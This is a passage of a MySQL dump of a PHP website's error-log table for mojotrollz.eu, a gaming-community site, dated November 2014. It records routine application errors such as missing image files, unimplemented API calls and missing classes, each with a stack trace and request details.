/home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.072, '2014-11-14 15:41:53', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=insert&race=undefined&type=1&id=0&name=test', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (196, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_visuals_action_insert', 'fb031d87527e27510ce44171956d62e59a356153', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.016, '2014-11-14 15:43:05', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=insert&race=1&type=1&id=0&name=test', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (198, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167379936', '9e0c5822b4b81c875bd24ae254c3cf789d9240f1', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.197', 0.008, '2014-11-16 20:50:56', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167379936', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (199, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167455402', '95d55f5c9a54270f6e76c33860dc3fec06a0343e', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.197', 0.004, '2014-11-16 20:51:24', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167455402', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (200, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167483568', 'fd7d333dbf4084b4f16990587423db68100ffea9', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.197', 0.008, '2014-11-16 20:51:26', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167483568', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (201, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167492943', '31fe04be72eed8b5768aa7a7e9d07546a7a85ed1', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.197', 0.004, '2014-11-16 20:51:42', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1416167492943', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (202, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Table \'mangos_zero_chars.quest_template\' doesn\'t exist', '9598a82479447eb3040bf9aa8b149047e2376f68', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(33): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\QUEST__TYE\', \'SELECT * FROM q...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\QUEST__TYE\', \'SELECT * FROM q...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(48): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(84): user_achievements_content->menu_quest()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_achievements_content->html()\n#5 {main}', '37.24.148.197', 0.06, '2014-11-16 23:33:01', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_content&menu=5&filter=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (204, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: page; value: wizard_toolbar ', '1fea9a95e2c8e859f12921e0298390511fa60a5c', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 196, '#0 /home/web/webdir/mojotrollz/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'page_mojotrollz\', Array, 1, false, true)\n#2 {main}', '37.24.148.197', 0.004, '2014-11-17 14:57:18', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=wizard_toolbar%20&last=wizard_spawn&next=wizard_register', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (205, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'back.png\' found.', '006bda55b03966847bdb2e017d39bdcc5d8c149c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'buttons\', \'back.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'buttons\', \'back.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-17 15:27:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=buttons&id=back.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (206, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'button_red.jpg\' found.', '80f5a423fc59300898c8db07c1afa9ab95c69b7c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'button_red.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'button_red.jpg\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.008, '2014-11-17 16:22:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=button_red.jpg', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/mojotrollz/page/user_default/css/user_default.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (207, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'btn_red.jpg\' found.', '28ec77e9015aacd4e891c9581010fceabfdfcaa4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'btn_red.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'btn_red.jpg\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.008, '2014-11-17 16:22:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=btn_red.jpg', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/mojotrollz/page/user_default/css/user_default.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (208, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'button_submenu.png\' found.', '7552580a6a189892673d462a9e83872e6341aebf', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'buttons\', \'button_submenu....\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'buttons\', \'button_submenu....\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.004, '2014-11-17 16:48:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=buttons&id=button_submenu.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/mojotrollz/page/user_default/css/user_default.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (209, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'backgroundss\' found.', '8af2ac2ccfe8a00102ab6d8908b00efa1deaa0be', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'backgroundss\', \'pergament_big.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'backgroundss\', \'pergament_big.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.008, '2014-11-17 17:13:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=backgroundss&id=pergament_big.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/mojotrollz/page/user_default/css/user_default.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (210, 'SYSTEM\\LOG\\ERROR', 'Class not found: player_classs', 'c5e37d2036b428733c64d4d3e476f2e647b48703', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'player_classs\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/wizard_summary/wizard_summary.php(7): spl_autoload_call(\'player_classs\')\n#2 /home/web/webdir/mojotrollz/index.php(12): wizard_summary->html()\n#3 {main}', '37.24.148.197', 0.004, '2014-11-17 17:52:34', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=wizard_summary', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (211, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'nightelf.png\' found.', 'e498c188776125f7998df2955d85a3d78cc5aea1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'nightelf.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'nightelf.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-17 17:56:14', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=nightelf.png', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (212, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'Mojologos\' found.', 'bf89fce581fa9755e796c2db1730738efbb190ee', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'Mojologos\', \'IMG_0084.gif\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'Mojologos\', \'IMG_0084.gif\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.02, '2014-11-17 18:05:15', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=Mojologos&id=IMG_0084.gif', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (213, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'mojologos\' found.', '786f9c9a46cef4ff2556aead5a8601044422ff0d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'mojologos\', \'IMG_0084.gif\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'mojologos\', \'IMG_0084.gif\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.028, '2014-11-17 18:09:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=mojologos&id=IMG_0084.gif', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (214, 'SYSTEM\\LOG\\ERROR', 'Class not found: player_spawns', '0ce338aa0decf607b2ceccc88346dfb88ad46c03', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'player_spawns\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/wizard_toolbar/wizard_toolbar.php(20): spl_autoload_call(\'player_spawns\')\n#2 /home/web/webdir/mojotrollz/index.php(12): wizard_toolbar->html()\n#3 {main}', '37.24.148.197', 0.008, '2014-11-17 18:29:57', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=wizard_toolbar&last=wizard_guild&next=wizard_summary', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (215, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'default.png\' found.', '708a915cfe8745a12e8d4b0a716babcef2e314ef', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'default.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'default.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-17 19:40:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=default.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (216, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'default2.png\' found.', '04449b99e2d3327c7e2a15783b9a61e4df8cd5ed', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'city\', \'default2.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'city\', \'default2.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-17 18:32:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=city&id=default2.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (217, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Stromwind.png\' found.', 'ee52fc285dd36dd7f76b4c0a36f225f942ab4b8a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'city\', \'Stromwind.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'city\', \'Stromwind.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-17 18:34:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=city&id=Stromwind.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (218, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Thunderbluf.png\' found.', '16b7538beb2a3aefadb43a9ff2f2d3d587046ea0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'city\', \'Thunderbluf.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'city\', \'Thunderbluf.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.012, '2014-11-17 18:36:02', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=city&id=Thunderbluf.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, 